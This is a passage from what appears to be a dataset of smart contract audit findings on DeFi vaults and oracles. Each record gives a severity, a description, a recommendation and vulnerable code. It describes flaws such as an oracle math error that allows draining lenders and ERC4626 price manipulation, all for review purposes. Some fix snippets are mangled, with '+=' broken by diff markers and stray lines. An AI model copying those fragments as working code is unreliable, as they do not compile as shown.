TwoTokenPoolUtils.sol\\nWhen calling function _unstakeAndExitPool,\\nthe contract withdraw BPT tokens back to the vault for redemption\\nby calling\\n```\\nstakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false);\\n```\\n\\nhowever, the underlying call withdrawAndUnwrap returns boolean value, the contract does not handle the return value.\\nThe see the interface of the IAuraRewardPool already indicate that the underlying call returns value\\n```\\ninterface IAuraRewardPool {\\n function withdrawAndUnwrap(uint256 amount, bool claim) external returns(bool);\\n```\\n\\nand the underlying call with BaseRewardConvexPool.sol also returns the boolean\\n```\\n function withdrawAndUnwrap(uint256 amount, bool claim) public updateReward(msg.sender) returns(bool){\\n```\\n","We recommend the project handle the return value when unstaking explicitly\\n```\\nbool unstaked = stakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false);\\nrequire(unstaked, 'unstake failed');\\n```\\n","Because there are stacks of external call:\\nNotional -> auraRewardPool -> BaseRewardPool,\\nwithout handling the return value explicitly, the transaction may risk fails silently.","```\\nstakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false);\\n```\\n" +stakingContext.auraBooster.deposit boolean return value not handled in Boosted3TokenPoolUtils.sol,medium,"stakingContext.auraBooster.deposit boolean return value not handled in Boosted3TokenPoolUtils.sol\\nthe function _joinPoolAndStake in Boosted3TokenPoolUtils.sol is used extensively when handling the token stake.\\nHowever, when entering the stake and interacting with external contract, the logic does not handle the returned boolean value in the code below\\n```\\n // Transfer token to Aura protocol for boosted staking\\n stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\\n```\\n\\nIn the AuraBooster implmenetation, a Boolean is indeed returned to acknowledge that deposit is completely successfully.\\n```\\n /**\\n * @notice Deposits an ""_amount"" to a given gauge (specified by _pid), mints a `DepositToken`\\n * and subsequently stakes that on Convex BaseRewardPool\\n */\\n function deposit(uint256 _pid, uint256 _amount, bool _stake) public returns(bool){\\n```\\n","We recommend the project handle the stakingContext.auraBooster.deposit boolean return value explicitly.\\n```\\n // Transfer token to Aura protocol for boosted staking\\n bool staked = stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\\n require(staked, 'stake failed');\\n```\\n","Notional -> AuraBooster -> BaseRewardPool\\nWithout handling the boolean value explitily, there is risk that transaction may be fail sliently.\\nBecause there are two layers of external call","```\\n // Transfer token to Aura protocol for boosted staking\\n stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\\n```\\n" +`CrossCurrencyfCashVault` Cannot Settle Its Assets In Pieces,medium,"The `CrossCurrencyfCashVault` vault cannot settle its assets in pieces. Thus, it might cause the vault to incur unnecessary slippage.\\nThe settle vault function is designed in a manner where its assets can be settled in pieces. Therefore, the `settleVault` function accepts a `strategyTokens` or `strategyTokensToRedeem` parameter to allow the caller to specify the number of strategy tokens to be settled.\\nThe reason as mentioned in Notional's walkthrough video (Refer to the explanation at 15.50min mark) is that in some cases the caller might want to break down into multiple transactions due to massive slippage.\\nFor instance, the vault might utilize a 2 day settlement period to allow the vault to settle its assets in pieces so that it can avoid unnecessary transaction costs associated with converting all its assets back to USDC in a single transaction.\\n```\\nFile: CrossCurrencyfCashVault.sol\\n /**\\n * @notice During settlement all of the fCash balance in the lend currency will be redeemed to the\\n * underlying token and traded back to the borrow currency. All of the borrow currency will be deposited\\n * into the Notional contract as asset tokens and held for accounts to withdraw. Settlement can only\\n * be called after maturity.\\n * @param maturity the maturity to settle\\n * @param settlementTrade details for the settlement trade\\n */\\n function settleVault(uint256 maturity, uint256 strategyTokens, bytes calldata settlementTrade) external {\\n require(maturity <= block.timestamp, ""Cannot Settle"");\\n VaultState memory vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n require(vaultState.isSettled == false);\\n require(vaultState.totalStrategyTokens >= strategyTokens);\\n\\n RedeemParams memory params = abi.decode(settlementTrade, (RedeemParams));\\n \\n // The only way for underlying value to be negative would be if the vault has somehow ended up with a borrowing\\n // position in the lend underlying currency. This is explicitly prevented during redemption.\\n uint256 underlyingValue = convertStrategyToUnderlying(\\n address(0), vaultState.totalStrategyTokens, maturity\\n ).toUint();\\n\\n // Authenticate the minimum purchase amount, all tokens will be sold given this slippage limit.\\n uint256 minAllowedPurchaseAmount = (underlyingValue * settlementSlippageLimit) / SETTLEMENT_SLIPPAGE_PRECISION;\\n require(params.minPurchaseAmount >= minAllowedPurchaseAmount, ""Purchase Limit"");\\n\\n NOTIONAL.redeemStrategyTokensToCash(maturity, strategyTokens, settlementTrade);\\n\\n // If there are no more strategy tokens left, then mark the vault as settled\\n vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n if (vaultState.totalStrategyTokens == 0) {\\n NOTIONAL.settleVault(address(this), maturity);\\n }\\n }\\n```\\n\\nDuring vault settlement, the `CrossCurrencyfCashVault._redeemFromNotional` function will be called, and the code in lines 252-262 will be executed. However, it was observed that the `strategyTokens` parameter is ignored, and the vault will forcefully settle all the strategy tokens in one go. As such, there is no way for the caller to break down the settle vault transaction into multiple transactions.\\n```\\nFile: CrossCurrencyfCashVault.sol\\n function _redeemFromNotional(\\n address account,\\n uint256 strategyTokens,\\n uint256 maturity,\\n bytes calldata data\\n ) internal override returns (uint256 borrowedCurrencyAmount) {\\n uint256 balanceBefore = LEND_UNDERLYING_TOKEN.balanceOf(address(this));\\n RedeemParams memory params = abi.decode(data, (RedeemParams));\\n\\n if (maturity <= block.timestamp) {\\n // Only allow the vault to redeem past maturity to settle all positions\\n require(account == address(this));\\n NOTIONAL.settleAccount(address(this));\\n (int256 cashBalance, /* */, /* */) = NOTIONAL.getAccountBalance(LEND_CURRENCY_ID, address(this));\\n\\n // It should never be possible that this contract has a negative cash balance\\n require(0 <= cashBalance && cashBalance <= int256(uint256(type(uint88).max)));\\n\\n // Withdraws all cash to underlying\\n NOTIONAL.withdraw(LEND_CURRENCY_ID, uint88(uint256(cashBalance)), true);\\n } else {\\n // Sells fCash on Notional AMM (via borrowing)\\n BalanceActionWithTrades[] memory action = _encodeBorrowTrade(\\n maturity,\\n strategyTokens,\\n params.maxBorrowRate\\n );\\n NOTIONAL.batchBalanceAndTradeAction(address(this), action);\\n\\n // Check that we have not somehow borrowed into a negative fCash position, vault borrows\\n // are not included in account context\\n AccountContext memory accountContext = NOTIONAL.getAccountContext(address(this));\\n require(accountContext.hasDebt == 0x00);\\n }\\n\\n uint256 balanceAfter = LEND_UNDERLYING_TOKEN.balanceOf(address(this));\\n \\n // Trade back to borrow currency for repayment\\n Trade memory trade = Trade({\\n tradeType: TradeType.EXACT_IN_SINGLE,\\n sellToken: address(LEND_UNDERLYING_TOKEN),\\n buyToken: address(_underlyingToken()),\\n amount: balanceAfter - balanceBefore,\\n limit: params.minPurchaseAmount,\\n deadline: block.timestamp,\\n exchangeData: params.exchangeData\\n });\\n\\n (/* */, borrowedCurrencyAmount) = _executeTrade(params.dexId, trade);\\n }\\n```\\n",It is recommended to update the `CrossCurrencyfCashVault._redeemFromNotional` function to allow the vault to be settled in multiple transactions.,The vault might incur unnecessary slippage during settlement as the settlement cannot be broken into multiple transactions.,"```\\nFile: CrossCurrencyfCashVault.sol\\n /**\\n * @notice During settlement all of the fCash balance in the lend currency will be redeemed to the\\n * underlying token and traded back to the borrow currency. All of the borrow currency will be deposited\\n * into the Notional contract as asset tokens and held for accounts to withdraw. Settlement can only\\n * be called after maturity.\\n * @param maturity the maturity to settle\\n * @param settlementTrade details for the settlement trade\\n */\\n function settleVault(uint256 maturity, uint256 strategyTokens, bytes calldata settlementTrade) external {\\n require(maturity <= block.timestamp, ""Cannot Settle"");\\n VaultState memory vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n require(vaultState.isSettled == false);\\n require(vaultState.totalStrategyTokens >= strategyTokens);\\n\\n RedeemParams memory params = abi.decode(settlementTrade, (RedeemParams));\\n \\n // The only way for underlying value to be negative would be if the vault has somehow ended up with a borrowing\\n // position in the lend underlying currency. This is explicitly prevented during redemption.\\n uint256 underlyingValue = convertStrategyToUnderlying(\\n address(0), vaultState.totalStrategyTokens, maturity\\n ).toUint();\\n\\n // Authenticate the minimum purchase amount, all tokens will be sold given this slippage limit.\\n uint256 minAllowedPurchaseAmount = (underlyingValue * settlementSlippageLimit) / SETTLEMENT_SLIPPAGE_PRECISION;\\n require(params.minPurchaseAmount >= minAllowedPurchaseAmount, ""Purchase Limit"");\\n\\n NOTIONAL.redeemStrategyTokensToCash(maturity, strategyTokens, settlementTrade);\\n\\n // If there are no more strategy tokens left, then mark the vault as settled\\n vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n if (vaultState.totalStrategyTokens == 0) {\\n NOTIONAL.settleVault(address(this), maturity);\\n }\\n }\\n```\\n" +`CrossCurrencyfCashVault` Cannot Be Upgraded,medium,"`CrossCurrencyfCashVault` cannot be upgraded as it is missing the authorize upgrade method.\\nThe Cross Currency Vault is expected to be upgradeable as:\\nThis vault is similar to the other vaults (Boosted3TokenAuraVault and MetaStable2TokenAuraVault) provided by Notional that are upgradeable by default.\\nThe `BaseStrategyVault` has configured the storage gaps `uint256[45] private __gap` for upgrading purposes\\nClarified with the sponsor and noted that Cross Currency Vault should be upgradeable\\n`CrossCurrencyfCashVault` inherits from `BaseStrategyVault`. However, the `BaseStrategyVault` forget to inherit Openzepplin's `UUPSUpgradeable` contract. Therefore, it is missing the authorize upgrade method, and the contract cannot be upgraded.\\n```\\nabstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n\\n /// @notice Hardcoded on the implementation contract during deployment\\n NotionalProxy public immutable NOTIONAL;\\n ITradingModule public immutable TRADING_MODULE;\\n uint8 constant internal INTERNAL_TOKEN_DECIMALS = 8;\\n \\n ..SNIP..\\n \\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n }\\n```\\n\\n```\\ncontract CrossCurrencyfCashVault is BaseStrategyVault {\\n using TypeConvert for uint256;\\n using TypeConvert for int256;\\n\\n uint256 public constant SETTLEMENT_SLIPPAGE_PRECISION = 1e18;\\n\\n struct DepositParams {\\n // Minimum purchase amount of the lend underlying token, this is\\n // based on the deposit + borrowed amount and must be set to a non-zero\\n // value to establish a slippage limit.\\n uint256 minPurchaseAmount;\\n // Minimum annualized lending rate, can be set to zero for no slippage limit\\n uint32 minLendRate;\\n // ID of the desired DEX to trade on, _depositFromNotional will always trade\\n // using an EXACT_IN_SINGLE trade which is supported by all DEXes\\n uint16 dexId;\\n // Exchange data depending on the selected dexId\\n ..SNIP..\\n```\\n","It is recommended to Inherit Openzepplin's `UUPSUpgradeable` contract and implement the missing authorize upgrade method.\\n```\\n// Remove the line below\\n abstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n// Add the line below\\n abstract contract BaseStrategyVault is Initializable, IStrategyVault, UUPSUpgradeable {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n\\n /// @notice Hardcoded on the implementation contract during deployment\\n NotionalProxy public immutable NOTIONAL;\\n ITradingModule public immutable TRADING_MODULE;\\n uint8 constant internal INTERNAL_TOKEN_DECIMALS = 8;\\n \\n ..SNIP..\\n \\n// Add the line below\\n function _authorizeUpgrade(\\n// Add the line below\\n address /* newImplementation */\\n// Add the line below\\n ) internal override onlyNotionalOwner {} \\n \\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n }\\n```\\n","If a critical bug is discovered within the Cross Currency Vault after launching that causes a loss of assets, the vault cannot be upgraded unlike the other balancer-related vaults to fix the bugs. All assets within the vault will be lost","```\\nabstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n\\n /// @notice Hardcoded on the implementation contract during deployment\\n NotionalProxy public immutable NOTIONAL;\\n ITradingModule public immutable TRADING_MODULE;\\n uint8 constant internal INTERNAL_TOKEN_DECIMALS = 8;\\n \\n ..SNIP..\\n \\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n }\\n```\\n" +"getGetAmplificationParameter() precision is not used, which result in accounting issue in MetaStable2TokenAuraHelper.sol and in Boosted3TokenAuraHelper.sol",medium,"getGetAmplificationParameter() precision is not used, which result in accounting issue in MetaStable2TokenAuraHelper.sol and in Boosted3TokenAuraHelper.sol\\nThis report has two part,\\npart one trace the accounting issue in MetaStable2TokenAuraHelper.sol,\\npart two trace the accounting issue in Boosted3TokenAuraHelper.sol,\\nboth issue rooted in not handling the getGetAmplificationParameter() precision\\nAccording to the Balancer documentation\\npool.getGetAmplificationParameter()\\nreturns something resembling\\nvalue : 620000 isUpdating : False precision : 1000\\nwhere the amplification parameter is 620000 / 1000 = 620\\nbut in the code, the isUpdating and precision returned is ignored and not used.\\nPart One\\nLet's trace the function reinvestReward in MetaStable2TokenAuraHelper.sol\\n```\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n )\\n```\\n\\nIt calls\\n```\\n// Make sure we are joining with the right proportion to minimize slippage\\n oracleContext._validateSpotPriceAndPairPrice({\\n poolContext: poolContext,\\n strategyContext: strategyContext,\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n\\nthen it calls\\n```\\nuint256 spotPrice = _getSpotPrice(oracleContext, poolContext, 0);\\n```\\n\\nthen it calls\\nInsite the function\\n```\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (poolContext.primaryBalance, poolContext.secondaryBalance) :\\n (poolContext.secondaryBalance, poolContext.primaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX,\\n balanceY: balanceY\\n });\\n```\\n\\nWhat's wrong with this, I believe the precision has issue for ampParam\\nBecause When we get the oracleContext.ampParam from MetaStable2TokenVaultMixin.sol\\nWe did not use the precision returned from the pool\\n```\\n (\\n uint256 value,\\n /* bool isUpdating */,\\n /* uint256 precision */\\n ) = IMetaStablePool(address(BALANCER_POOL_TOKEN)).getAmplificationParameter();\\n```\\n\\nAccording to the Balancer documentation\\npool.getGetAmplificationParameter()\\nreturns something resembling\\nvalue : 620000 isUpdating : False precision : 1000\\nwhere the amplification parameter is 620000 / 1000 = 620\\nThe formula that calculate the spot price is\\n```\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n```\\n\\nthe function _calcSpotPrice hardcode the amp precision to 1e3;\\n```\\n uint256 internal constant _AMP_PRECISION = 1e3;\\n```\\n\\nand implement\\n```\\nuint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n```\\n\\nif the pool's ampParameter is not equal to _AMP_PRECISION, the math will break.\\nPart Two\\nLet's trace the call in Boosted3TokenPoolUtils.sol\\nFirst the function reinvestReward in Boosted3TokenAuraHelper.sol is called\\n```\\n function reinvestReward(\\n Boosted3TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) \\n```\\n\\nThen we call\\n```\\n uint256 minBPT = context.poolContext._getMinBPT(\\n oracleContext, strategyContext, primaryAmount\\n );\\n```\\n\\nthen we call\\n```\\n minBPT = StableMath._calcBptOutGivenExactTokensIn({\\n amp: oracleContext.ampParam,\\n balances: balances,\\n amountsIn: amountsIn,\\n bptTotalSupply: virtualSupply,\\n swapFeePercentage: 0,\\n currentInvariant: invariant\\n });\\n```\\n\\nthen we call\\n```\\n // Get current and new invariants, taking swap fees into account\\n uint256 newInvariant = _calculateInvariant(amp, newBalances, false);\\n uint256 invariantRatio = newInvariant.divDown(currentInvariant);\\n```\\n\\nthen we call\\n```\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n```\\n\\nwe just use the amplificationParameter without handling the precision.\\nThe amplificationParameter comes from BoostedTokenPoolMixin.sol\\n```\\n (\\n uint256 value,\\n /* bool isUpdating */,\\n /* uint256 precision */\\n ) = pool.getAmplificationParameter();\\n```\\n\\nthe isUpdating and precision is not used,\\nhowever, according to the documentation\\nAccording to the Balancer documentation\\npool.getGetAmplificationParameter()\\nreturns something resembling\\nvalue : 620000 isUpdating : False precision : 1000\\nwhere the amplification parameter is 620000 / 1000 = 620","Issue getGetAmplificationParameter() precision is not used, which result in accounting issue in MetaStable2TokenAuraHelper.sol and in Boosted3TokenAuraHelper.sol\\nWe recommend the project use the precision returned from getGetAmplificationParameter()\\n```\\n (\\n uint256 value,\\n bool isUpdating */,\\n uint256 precision */\\n ) = IMetaStablePool(address(BALANCER_POOL_TOKEN)).getAmplificationParameter();\\n return value / precision;\\n```\\n","The amplificationParameter has precision, ignoring the precision will result in accounting issue.\\nIf the precision of the amplificationParameter is not equal to hardcoded 1e3, the spot price is invalid.\\nthe code\\n```\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n```\\n\\nwill be overvalued because we did not divide the value by the precision.","```\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n )\\n```\\n" +"When one of the plugins is broken or paused, `deposit()` or `withdraw()` of the whole Vault contract can malfunction",medium,"One malfunctioning plugin can result in the whole Vault contract malfunctioning.\\nA given plugin can temporally or even permanently becomes malfunctioning (cannot deposit/withdraw) for all sorts of reasons.\\nEg, Aave V2 Lending Pool can be paused, which will prevent multiple core functions that the Aave v2 plugin depends on from working, including `lendingPool.deposit()` and `lendingPool.withdraw()`.\\n```\\n modifier whenNotPaused() {\\n _whenNotPaused();\\n _;\\n }\\n```\\n\\n```\\n function withdraw(\\n address asset,\\n uint256 amount,\\n address to\\n ) external override whenNotPaused returns (uint256) {\\n```\\n\\nThat's because the deposit will always goes to the first plugin, and withdraw from the last plugin first.","Issue When one of the plugins is broken or paused, `deposit()` or `withdraw()` of the whole Vault contract can malfunction\\nConsider introducing a new method to pause one plugin from the Vault contract level;\\nAave V2's Lending Pool contract has a view function `paused()`, consider returning `0` for `availableForDeposit()` and ``availableForWithdrawal() when pool paused in AaveV2Plugin:\\n```\\nfunction availableForDeposit() public view override returns (uint256) {\\n if (lendingPool.paused()) return 0;\\n return type(uint256).max - balance();\\n}\\n```\\n\\n```\\nfunction availableForWithdrawal() public view override returns (uint256) {\\n if (lendingPool.paused()) return 0;\\n return balance();\\n}\\n```\\n","When Aave V2 Lending Pool is paused, users won't be able to deposit or withdraw from the vault.\\nNeither can the owner remove the plugin nor rebalanced it to other plugins to resume operation.\\nBecause withdrawal from the plugin can not be done, and removing a plugin or rebalancing both rely on this.",```\\n modifier whenNotPaused() {\\n _whenNotPaused();\\n _;\\n }\\n```\\n +`_withdrawFromPlugin()` will revert when `_withdrawalValues[i] == 0`,medium,"When `_withdrawalValues[i] == 0` in `rebalancePlugins()`, it means NOT to rebalance this plugin.\\nHowever, the current implementation still tries to withdraw 0 from the plugin.\\nThis will revert in AaveV2Plugin as Aave V2's `validateWithdraw()` does not allow `0` withdrawals:\\n```\\n function validateWithdraw(\\n address reserveAddress,\\n uint256 amount,\\n uint256 userBalance,\\n mapping(address => DataTypes.ReserveData) storage reservesData,\\n DataTypes.UserConfigurationMap storage userConfig,\\n mapping(uint256 => address) storage reserves,\\n uint256 reservesCount,\\n address oracle\\n ) external view {\\n require(amount != 0, Errors.VL_INVALID_AMOUNT);\\n```\\n\\n`removePlugin()` will also always `_withdrawFromPlugin()` even if the plugin's balance is 0, as it will also tries to withdraw 0 in that case (balance is 0).","Only call `_withdrawFromPlugin()` when IPlugin(pluginAddr).balance() > 0:\\n```\\nfunction removePlugin(uint256 _index) external onlyOwner {\\n require(_index < pluginCount, ""Index out of bounds"");\\n address pluginAddr = plugins[_index];\\n if (IPlugin(pluginAddr).balance() > 0){\\n _withdrawFromPlugin(pluginAddr, IPlugin(pluginAddr).balance());\\n }\\n uint256 pointer = _index;\\n while (pointer < pluginCount - 1) {\\n plugins[pointer] = plugins[pointer + 1];\\n pointer++;\\n }\\n delete plugins[pluginCount - 1];\\n pluginCount--;\\n\\n IERC20(LINK).approve(pluginAddr, 0);\\n\\n emit PluginRemoved(pluginAddr);\\n}\\n```\\n\\n```\\nfunction rebalancePlugins(uint256[] memory _withdrawalValues) external onlyOwner {\\n require(_withdrawalValues.length == pluginCount, ""Invalid withdrawal values"");\\n for (uint256 i = 0; i < pluginCount; i++) {\\n if (_withdrawalValues[i] > 0)\\n _withdrawFromPlugin(plugins[i], _withdrawalValues[i]);\\n }\\n _distributeToPlugins();\\n}\\n```\\n","For AaveV2Plugin (and any future plugins that dont allow withdraw 0):\\nIn every rebalance call, it must at least withdraw 1 wei from the plugin for the rebalance to work.\\nThe plugin can not be removed or rebalanced when there is no balance in it.\\nIf such a plugin can not deposit for some reason (paused by gov, AaveV2Plugin may face that), this will further cause the whole system unable to be rebalanced until the deposit resumes for that plugin.","```\\n function validateWithdraw(\\n address reserveAddress,\\n uint256 amount,\\n uint256 userBalance,\\n mapping(address => DataTypes.ReserveData) storage reservesData,\\n DataTypes.UserConfigurationMap storage userConfig,\\n mapping(uint256 => address) storage reserves,\\n uint256 reservesCount,\\n address oracle\\n ) external view {\\n require(amount != 0, Errors.VL_INVALID_AMOUNT);\\n```\\n" +Unregulated joining fees,medium,"Observe the _deposit function\\nThis makes call to join function\\n```\\nfunction join(uint256 amount) external override joiningNotPaused {\\n uint256 fee = amount.mul(joiningFee).div(BASIS_PRECISION);\\n uint256 mintedAmount = mint(amount.sub(fee));\\n claimableFees = claimableFees.add(fee);\\n\\n // TODO: tx.origin will be deprecated in a future ethereum upgrade\\n latestJoinBlock[tx.origin] = block.number;\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n\\n emit Joined(msg.sender, amount, mintedAmount);\\n }\\n```\\n\\nAs we can see this join function deducts a fees from the deposited amount before minting. Lets see this joining fees\\nThe joining fees is introduced using setJoiningFee function\\n```\\nfunction setJoiningFee(uint256 fee) external onlyOwner {\\n require(fee <= BASIS_PRECISION, ""TrueFiPool: Fee cannot exceed transaction value"");\\n joiningFee = fee;\\n emit JoiningFeeChanged(fee);\\n }\\n```\\n\\nThis means the joiningFee will always be in between 0 to BASIS_PRECISION. This BASIS_PRECISION can be 100% as shown\\n```\\nuint256 private constant BASIS_PRECISION = 10000;\\n```\\n\\nThis means if joiningFee is set to BASIS_PRECISION then all user deposit will goto joining fees with user getting nothing","Issue Unregulated joining fees\\nPost calling join, check amount of shares minted for this user (use balanceOF on TrueFiPool2.sol) and if it is below minimum expected revert the transaction\\n```\\nuint256 tfUsdcBalance = tfUSDC.balanceOf(address(this));\\nrequire(tfUsdcBalance>=minSharesExpected, ""Too high fees"");\\n```\\n",Contract will lose all deposited funds,"```\\nfunction join(uint256 amount) external override joiningNotPaused {\\n uint256 fee = amount.mul(joiningFee).div(BASIS_PRECISION);\\n uint256 mintedAmount = mint(amount.sub(fee));\\n claimableFees = claimableFees.add(fee);\\n\\n // TODO: tx.origin will be deprecated in a future ethereum upgrade\\n latestJoinBlock[tx.origin] = block.number;\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n\\n emit Joined(msg.sender, amount, mintedAmount);\\n }\\n```\\n" +CTokenOracle.sol#getCErc20Price contains critical math error,high,"CTokenOracle.sol#getCErc20Price contains a math error that immensely overvalues CTokens\\nCTokenOracle.sol#L66-L76\\n```\\nfunction getCErc20Price(ICToken cToken, address underlying) internal view returns (uint) {\\n /*\\n cToken Exchange rates are scaled by 10^(18 - 8 + underlying token decimals) so to scale\\n the exchange rate to 18 decimals we must multiply it by 1e8 and then divide it by the\\n number of decimals in the underlying token. Finally to find the price of the cToken we\\n must multiply this value with the current price of the underlying token\\n */\\n return cToken.exchangeRateStored()\\n .mulDivDown(1e8 , IERC20(underlying).decimals())\\n .mulWadDown(oracle.getPrice(underlying));\\n}\\n```\\n\\nIn L74, IERC20(underlying).decimals() is not raised to the power of 10. The results in the price of the LP being overvalued by many order of magnitudes. A user could deposit one CToken and drain the reserves of every liquidity pool.","Issue CTokenOracle.sol#getCErc20Price contains critical math error\\nFix the math error by changing L74:\\n```\\nreturn cToken.exchangeRateStored()\\n.mulDivDown(1e8 , 10 ** IERC20(underlying).decimals())\\n.mulWadDown(oracle.getPrice(underlying));\\n \\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.",All lenders could be drained of all their funds due to excessive over valuation of CTokens cause by this error,"```\\nfunction getCErc20Price(ICToken cToken, address underlying) internal view returns (uint) {\\n /*\\n cToken Exchange rates are scaled by 10^(18 - 8 + underlying token decimals) so to scale\\n the exchange rate to 18 decimals we must multiply it by 1e8 and then divide it by the\\n number of decimals in the underlying token. Finally to find the price of the cToken we\\n must multiply this value with the current price of the underlying token\\n */\\n return cToken.exchangeRateStored()\\n .mulDivDown(1e8 , IERC20(underlying).decimals())\\n .mulWadDown(oracle.getPrice(underlying));\\n}\\n```\\n" +Protocol Reserve Within A LToken Vault Can Be Lent Out,medium,"Protocol reserve, which serves as a liquidity backstop or to compensate the protocol, within a LToken vault can be lent out to the borrowers.\\nThe purpose of the protocol reserve within a LToken vault is to compensate the protocol or serve as a liquidity backstop. However, based on the current setup, it is possible for the protocol reserve within a Ltoken vault to be lent out.\\nThe following functions within the `LToken` contract show that the protocol reserve is intentionally preserved by removing the protocol reserve from the calculation of total assets within a `LToken` vault. As such, whenever the Liquidity Providers (LPs) attempt to redeem their LP token, the protocol reserves will stay intact and will not be withdrawn by the LPs.\\n```\\nfunction totalAssets() public view override returns (uint) {\\n return asset.balanceOf(address(this)) + getBorrows() - getReserves();\\n}\\n```\\n\\n```\\nfunction getBorrows() public view returns (uint) {\\n return borrows + borrows.mulWadUp(getRateFactor());\\n}\\n```\\n\\n```\\nfunction getReserves() public view returns (uint) {\\n return reserves + borrows.mulWadUp(getRateFactor())\\n .mulWadUp(reserveFactor);\\n}\\n```\\n\\nHowever, this measure is not applied consistently across the protocol. The following `lendTo` function shows that as long as the borrower has sufficient collateral to ensure their account remains healthy, the borrower could borrow as many assets from the LToken vault as they wish.\\nIn the worst-case scenario, the borrower can borrow all the assets from the LToken vault, including the protocol reserve.\\n```\\nFile: LToken.sol\\n /**\\n @notice Lends a specified amount of underlying asset to an account\\n @param account Address of account\\n @param amt Amount of token to lend\\n @return isFirstBorrow Returns if the account is borrowing the asset for\\n the first time\\n */\\n function lendTo(address account, uint amt)\\n external\\n whenNotPaused\\n accountManagerOnly\\n returns (bool isFirstBorrow)\\n {\\n updateState();\\n isFirstBorrow = (borrowsOf[account] == 0);\\n\\n uint borrowShares;\\n require((borrowShares = convertAssetToBorrowShares(amt)) != 0, ""ZERO_BORROW_SHARES"");\\n totalBorrowShares += borrowShares;\\n borrowsOf[account] += borrowShares;\\n\\n borrows += amt;\\n asset.safeTransfer(account, amt);\\n return isFirstBorrow;\\n }\\n```\\n","Issue Protocol Reserve Within A LToken Vault Can Be Lent Out\\nConsider updating the `lendTo` function to ensure that the protocol reserve is preserved and cannot be lent out. If the underlying asset of a LToken vault is less than or equal to the protocol reserve, the lending should be paused as it is more important to preserve the protocol reserve compared to lending them out.\\n```\\nfunction lendTo(address account, uint amt)\\n external\\n whenNotPaused\\n accountManagerOnly\\n returns (bool isFirstBorrow)\\n{\\n updateState();\\n isFirstBorrow = (borrowsOf[account] == 0);\\n \\n require\\n\\n uint borrowShares;\\n require((borrowShares = convertAssetToBorrowShares(amt)) != 0, ""ZERO_BORROW_SHARES"");\\n totalBorrowShares // Add the line below\\n= borrowShares;\\n borrowsOf[account] // Add the line below\\n= borrowShares;\\n\\n borrows // Add the line below\\n= amt;\\n asset.safeTransfer(account, amt);\\n \\n// Add the line below\\n require(asset.balanceOf(address(this)) >= getReserves(), ""Not enough liquidity for lending"") \\n \\n return isFirstBorrow;\\n}\\n```\\n\\nSentiment Team\\nWe removed reserves completely in this PR.\\nLead Senior Watson\\nConfirmed fix.","The purpose of the protocol reserve within a LToken vault is to compensate the protocol or serve as a liquidity backstop. Without the protocol reserve, the protocol will become illiquidity, and there is no fund to compensate the protocol.",```\\nfunction totalAssets() public view override returns (uint) {\\n return asset.balanceOf(address(this)) + getBorrows() - getReserves();\\n}\\n```\\n +ERC4626Oracle Vulnerable To Price Manipulation,medium,"ERC4626 oracle is vulnerable to price manipulation. This allows an attacker to increase or decrease the price to carry out various attacks against the protocol.\\nThe `getPrice` function within the `ERC4626Oracle` contract is vulnerable to price manipulation because the price can be increased or decreased within a single transaction/block.\\nBased on the `getPrice` function, the price of the LP token of an ERC4626 vault is dependent on the `ERC4626.previewRedeem` and `oracleFacade.getPrice` functions. If the value returns by either `ERC4626.previewRedeem` or `oracleFacade.getPrice` can be manipulated within a single transaction/block, the price of the LP token of an ERC4626 vault is considered to be vulnerable to price manipulation.\\n```\\nFile: ERC4626Oracle.sol\\n function getPrice(address token) external view returns (uint) {\\n uint decimals = IERC4626(token).decimals();\\n return IERC4626(token).previewRedeem(\\n 10 ** decimals\\n ).mulDivDown(\\n oracleFacade.getPrice(IERC4626(token).asset()),\\n 10 ** decimals\\n );\\n }\\n```\\n\\nIt was observed that the `ERC4626.previewRedeem` couldbe manipulated within a single transaction/block. As shown below, the `previewRedeem` function will call the `convertToAssets` function. Within the `convertToAssets`, the number of assets per share is calculated based on the current/spot total assets and current/spot supply that can be increased or decreased within a single block/transaction by calling the vault's deposit, mint, withdraw or redeem functions. This allows the attacker to artificially inflate or deflate the price within a single 